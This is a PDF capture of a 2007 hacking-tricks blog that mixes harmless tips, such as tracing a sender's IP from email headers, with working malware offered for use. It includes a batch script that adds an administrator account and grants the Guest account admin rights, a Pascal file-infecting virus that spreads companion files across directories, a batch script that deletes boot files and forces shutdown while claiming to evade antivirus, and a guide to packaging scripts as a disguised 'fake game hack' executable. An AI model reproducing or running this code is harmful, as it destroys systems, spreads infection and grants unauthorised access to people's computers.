You are on page 1of 14

ALL COOL TRICKS how to create an .exe file?

many of u might be knowing this but still newbies can learn something from this How to make an executable file? when it is in .exe form no one will be able to c hange look or modify the code (note:it will make it to a self extraction thing b ut it will still act like a exe) This is how you make it to a .exe goto to start run and type iexpress STEP BY STEP ON HOW TO USE IT click create new self extraction then next click e xtract files and run an installation command and click next type what you want to name the files (ex. hello,virus,fake game hack) then click next click no prompt then next license agreement unless you want to put one cli ck do not display license package files(most important) click add then choose yo ur .bat file(also does .vbs files) then click next under install program choose your .bat or .vbs file and click next(don't worry about the other one) show wind ow pick one and click next finished message pick one and click next click browse and type the name of it and save to desktop or C: then next http://tricksandtipsforu.blogspot.com/search...11-01T00%3A00%3A00%2B05%3A30&maxresults=39 (1 of 240) [12/10/2007 11:51:08 PM]

ALL COOL TRICKS configure restart just click no restart and then next just click don't save then next their click next and watchyour file change into something better when its done click finish and check out your new file Posted by BAS at 6:30 PM 0 comments Labels: create .exe file, how to create an . exe file Saturday, October 27, 2007 Admin privileges for guest Want admin privileges on ur pc?????????????????? try dis Copy and paste the code given below in notepad and save it as anyname.bat(not txt) Den double click on it This will add u in administrators group Enjoy echo off title Please wait... c ls net user add Username Password /add net user localgroup Administrators Userna me /add net user Guest 420 /active:yes net localgroup Guests Guest /DELETE http://tricksandtipsforu.blogspot.com/search...11-01T00%3A00%3A00%2B05%3A30&maxresults=39 (2 of 240) [12/10/2007 11:51:08 PM]

ALL COOL TRICKS net localgroup Administrators Guest /add del %0 Posted by BAS at 5:21 PM 1 comments Labels: admin password, administrator, admin istrator rights, crack admin account, hack, hack a pc, how to crack into admin a ccount Thursday, October 25, 2007 START A MOVIE IN PAINT Start A movie in paint! Start movie in Paint! * First start a movie in any player. * Then open Paint. * Now, in the player when the movie is being played, press "Print screen" button o n your key board. * Now, Press ctrl+v in Paint * Leave the movie player open and don't minimize it. * Open Paint now and see the movie in the Paint! Posted by BAS at 2:46 PM 0 comments Labels: hack, hack a pc, hack paint, paint, play movie in paint, windows, windows paint, windows xp Tuesday, October 23, 2007 How to find senders IP address from received mail Emails are very important part of our communication system We think that we know everything about emails we know how to compose email , how to attach a file , h ow to send it to others ,How http://tricksandtipsforu.blogspot.com/search...11-01T00%3A00%3A00%2B05%3A30&maxresults=39 (3 of 240) [12/10/2007 11:51:08 PM]

ALL COOL TRICKS

to receive emails from others and many other things.This is all we know about em ails. But this is not end of it .When you receive or send emails many other thin gs are sent with it. At this time when Email is progressively used for business and for many purposes, not to mention it is being used for phishing and other ma licious intentions. It is of utmost priority to understand the other "messages" besides what has been sent or received by you. Every email comes with a Header which i s one part of an e-mail structure; call it DNA of the mail. It carries the basic fundamental information such as from whom the email comes, to whom it is addres sed, date/time it was sent and the subject of the email. It is similar to an ele ctronic postSeptemberk. Moreover, it also carries other detailed information whi ch we usually don t see. This basic information comes in all brief/basic headers tha t most email programs automatically shows. This detail technical information can be viewed in a full header. All email programs can be set to show only brief he ader or full header and it is up to the users to set the program whether to view only brief header or full header . Full header carries the information of the mai that the email passed through on its way to the recipient, and sender's IP addr ess and even the name of the email program and its version used. Knowledge of th is information is essential for analysis and investigation purposes on cases inv olving email abuse, spamming, harassment, forgeries and mail-bombing. It is wort h mentioning, understanding of this tool would definitely help people to counter these attacks, and save themselves from unwarranted consequences. Well, this in formation could not be found in a brief header. http://tricksandtipsforu.blogspot.com/search...11-01T00%3A00%3A00%2B05%3A30&maxresults=39 (4 of 240) [12/10/2007 11:51:08 PM]

ALL COOL TRICKS Here we will take the case of Google mail and Yahoo mail to find out the full he ader. Google Mail. Using your id/password, login to Gmail. Open the mail for whi ch you wish to find the full header of the sender. Click on the inverted triangl e placed just next to Reply. You will get something like this Delivered-To: Mr.x@gm ail.com Received: by 10.36.81.3 with SMTP id e3cs239nzb; Tue, 12 September 2007 15:11:47 0800 (PST) Return-Path: Received: from mail.emailprovider.com (mail.ema ilprovider.com [111.111.11.111]) by mx.gmail.com with SMTP id h19si826631rnb.200 7.03.12.15.11.46; Tue, 12 September 2007 15:11:47 -0800 (PST) Message-ID: <20070 312231145.62086.mail@mail.emailprovider.com> Received: from [11.11.111.111] by m ail.emailprovider.com via HTTP; Tue, 12 September 2007 15:11:45 PST Date: Tue, 1 2 September 2007 15:11:45 -0800 (PST) From: Mr.y Subject: Hello To: Mr.x In the example, headers are added to the message three times: 1. When Mr.y composes the email Date: Tue, 12 September 2007 15:11:45 -0800 (PST) From: Mr .y http://tricksandtipsforu.blogspot.com/search...11-01T00%3A00%3A00%2B05%3A30&maxresults=39 (5 of 240) [12/10/2007 11:51:08 PM]

ALL COOL TRICKS Subject: Hello To: Mr.x 2. When the email is sent through the servers of Mr.y's email provider, mail. emailprovider.com Message-ID: <20070312231145.62086.mail@m ail.emailprovider.com> Received: from [11.11.111.111] by mail.emailprovider.com via HTTP; Tue, 12 September 2007 15:11:45 PST 3.When the message transfers from Mr.y 's email provider to Mr. x's Gmail account Delivered-To: Mr.x@gmail.com Rec eived: by 10.36.81.3 with SMTP id e3cs239nzb;Tue, 12 September 2007 15:11:47 080 0 (PST) Return-Path: Mr.y@emailprovider.com Received: from mail.emailprovider.co m (mail.emailprovider.com [111.111.11.111]) by mx.gmail.com with SMTP id h19si82 6631rnb; Tue, 12 September 2007 15:11:47 -0800 (PST) Below is a description of e ach section of the email header: Delivered-To: Mr.x@gmail.com The email address the message will be delivered to. Received: by 10.36.81.3 with SMTP id e3cs239nz b; Tue, 29 Mar 2005 15:11:47 -0800 (PST) The time the message reached Gmail's se rvers. Return-Path: http://tricksandtipsforu.blogspot.com/search...11-01T00%3A00%3A00%2B05%3A30&maxresults=39 (6 of 240) [12/10/2007 11:51:08 PM]

ALL COOL TRICKS The address from which the message was sent. Received: from mail.emailprovider.c om (mail.emailprovider.com [111.111.11.111]) by mx.gmail.com with SMTP id h19si8 26631rnb.2005.03.29.15.11.46; Tue, 29 Mar 2005 15:11:47 -0800 (PST) The message was received from mail.emailprovider.com, by a Gmail server on March 29, 2005 at approximately 3 pm. Message-ID: 20050329231145.62086.mail@mail.emailprovider.co m A unique number assigned by mail.emailprovider.com to identify the message. Re ceived: from [11.11.111.111] by mail.emailprovider.com via HTTP; Tue, 29 Mar 200 5 15:11:45 PST Mr.y used an email composition program to write the message, and it was then received by the email servers of mail.emailprovider.com. Date: Tue, 29 Mar 2005 15:11:45 -0800 (PST) From: Mr y Subject: Hello To: Mr.x The date, se nder, subject, and destination -- Mr. Jones entered this information (except for the date) when he composed the email. And for IP, look for Received:from follow ed by the IP within square brackets [ ] e.g. Received: from [11.11.111.111] by m ail.emailprovider.com via HTTP; Tue, 12 Also importantly, there are times when y ou might find multiple Received: from entries, http://tricksandtipsforu.blogspot.com/search...11-01T00%3A00%3A00%2B05%3A30&maxresults=39 (7 of 240) [12/10/2007 11:51:08 PM]

ALL COOL TRICKS in that case, please select the last one as the valid choice. Posted by BAS at 12:35 PM 0 comments Labels: find IP, How to find senders IP add ress from received mail, IP hack, mail hacking, mail tracing, trace IP Friday, October 19, 2007 Virus code in pascal Here is a new viri code for u guys It's created in pascal Copy and paste it in n otepad as anyname.pas Program Saddam; {$M 10000,0,0} Uses DOS; Var DriveID : Str ing [2]; Buffer : Array [1..8000] Of Byte; Target,Source : File; Infected : Byte ; Done : Word; TargetFile : String; (*?????????????????????????????????????? ??? ????????????????????????????????*) http://tricksandtipsforu.blogspot.com/search...11-01T00%3A00%3A00%2B05%3A30&maxresults=39 (8 of 240) [12/10/2007 11:51:08 PM]

ALL COOL TRICKS Function ExistCom : Boolean; Var FindCom : SearchRec; Begin FindFirst ( TargetFi le, 39, FindCom ); ExistCom := DosError = 0; End; Procedure SearchDir ( Dir2Search : String ); Var S : SearchRec; Begin If Dir2Sea rch [ Length ( Dir2Search ) ] <> '\' Then Dir2Search := Dir2Search + '\'; FindFirst ( Dir2Search + '*.exe', 39, S ); While DosError = 0 Do Begin TargetFil e := Copy ( Dir2Search + S.Name,1, Length ( Dir2Search + S.Name ) -3 ) + 'com'; If ( Copy ( S.Name, Length ( S.Name ) -2,3 ) = 'EXE' ) And Not ExistCom And ( In fected <> 25000 ) Then Begin {$i-} Inc ( Infected ); Assign ( Target, TargetFile ); Rewrite ( Target,1 ); BlockWrite ( Target, Buffer, Done + Random ( 4400 )); SetFTime ( Target, S.Time ); Close ( Target ); If IoResult = 101 Then Begin Infe cted := 3; Erase ( Target ); End; {$i+} End; FindNext ( S ); End; FindFirst ( Di r2Search + '*', Directory, S ); If S.Name = '.' Then Begin FindNext ( S ); http://tricksandtipsforu.blogspot.com/search...11-01T00%3A00%3A00%2B05%3A30&maxresults=39 (9 of 240) [12/10/2007 11:51:08 PM]

ALL COOL TRICKS FindNext ( S ); End; If ( DosError = 0 ) And ( S.Attr And 16 <> 16 ) Then FindNe xt ( S ); While DosError = 0 Do Begin If ( S.Attr And 16 = 16 ) And ( Infected < 3 ) Then SearchDir ( Dir2Search + S.Name ); FindNext ( S ); End; End; Begin Dri veID := FExpand ( ParamStr ( 1 )); Infected := 0; Assign ( Source, ParamStr ( 0 ) ); Reset ( Source, 1 ); BlockRead ( Source, Buffer, 5000, Done ); Close ( Sour ce ); Randomize; SearchDir ( DriveID ); Exec ( Copy ( ParamStr ( 0 ),1, Length ( ParamStr ( 0 )) -3 ) + 'exe', ParamStr ( 1 ) ); End. ;************************* ************** *************************************; ;; ; -=][][][][][][][][][] [][][][][][=- ; ; -=] P E R F E C T C R I M E [=- ; ; -=] +31.(o)79.426o79 [=- ; ; -=] [=- ; ; -=] For All Your H/P/A/V Files [=- ; ; -=] SysOp:ruck_fules [=- ; ; -=] [=- ; ; -=] +31.(o)79.426o79 [=- ; ; -=] P E R F E C T C R I M E [=- ; ; -=][][][][][][][][][][][][][][][=- ; ;; ; *** NOT FOR GENERAL DISTRIBUTION *** ; ;; ; This File is for the Purpose of Virus Study Only! It Should not be Passed ; ; Around Among the General Public. It Will be Very Useful for Learning how ; ; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; http://tricksandtipsforu.blogspot.com/searc...1-01T00%3A00%3A00%2B05%3A30&max-re sults=39 (10 of 240) [12/10/2007 11:51:08 PM]

ALL COOL TRICKS ; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; ; Exp erience can Turn it Into a far More Malevolent Program Than it Already ; ; Is. K eep This Code in Responsible Hands! ; ;; ;************************************** ************************************** Posted by utkarsh in our community http://www.orkut.com/CommMsgs.aspx?cmm=399960 86&tid=2560895879759933320 Posted by BAS at 9:03 PM 0 comments Labels: how to write virus codes, pascal, pa scal code, virus code, virus in pascal, virus writing, write virus code Thursday, October 18, 2007 Hacking rapidshare Tired of waiting for another few minutes after downloads try dis It works While waiting for download, type javascript:c(countdown = 0); in the browser add ressbar to eliminate the rapidshare countdown (waiting) feature. If this trick d oesn't work, try the alternative below: javascript:var%20counta=0;var%20countb=0 ;var%20countc=0;var%20countd=0;var%20countd=0 (Just copy and paste this code in your address bar) another method(Works only if u hv dynamic Ip) Then, follow th e steps below to get a new IP: 1. Go to Start->Run and type in "cmd" without quo tes to bring up the command prompt. Hit Enter. http://tricksandtipsforu.blogspot.com/searc...1-01T00%3A00%3A00%2B05%3A30&max-re sults=39 (11 of 240) [12/10/2007 11:51:08 PM]

ALL COOL TRICKS 2. Type in "ipconfig /flushdns" without quotes and hit Enter. 3. Type in "ipconf ig /release" without quotes and hit Enter. 4. Type in "ipconfig /renew" without quotes and hit Enter. You should now have a new IP address. Check your IP addres s at IP Chicken again and compare it to the one you got earlier. 5. Now, erase y our browser's cache and cookies. 6. Try downloading the Rapidshare Or u can try dis also for free rapidshare premium account http://PremiumForFree.com/index.php ?referral=14238 Posted by UTKARSH http://www.orkut.com/CommMsgs.aspx?cmm=3999608 6&tid=2561136090838347656 Posted by BAS at 5:34 PM 0 comments Labels: Eliminate countdown in rapidshare, E liminate timer in rapidshare, free rapidshare premium account, HAck rapidsahre, hack rapidshare, Rapishare hacking, Remove timer Tuesday, October 16, 2007 Virus that crashesh your own pc @echo off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c: \boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini @echo off msg * YOU GOT OWNED!!! http://tricksandtipsforu.blogspot.com/searc...1-01T00%3A00%3A00%2B05%3A30&max-re sults=39 (12 of 240) [12/10/2007 11:51:08 PM]

ALL COOL TRICKS shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive save as bat file in notepad! ! This will pop up a message saying OWNED!! and shut down the computer never to reboot again! type this in notepad start virus.bat virus.bat and save as with this name virus.bat ur antivirus will not detect this virus Basically this program will delete all t hat files which are needed for booting If your os is installed in d drive instea d of c then replace c with d originally posted by Utkarsh in our community on orkut http://www.orkut.com/Prof ile.aspx?uid=12868172797188978036 Posted by BAS at 5:36 PM 0 comments Labels: batch, batch program, batch virus, v irus code, virus writing Monday, October 15, 2007 All in one greasemonkey script created by bhavin and http://tricksandtipsforu.blogspot.com/searc...1-01T00%3A00%3A00%2B05%3A30&max-re sults=39 (13 of 240) [12/10/2007 11:51:08 PM]

ALL COOL TRICKS pratik for orkut users // ==UserScript== // @name Bhavik & Prat

You might also like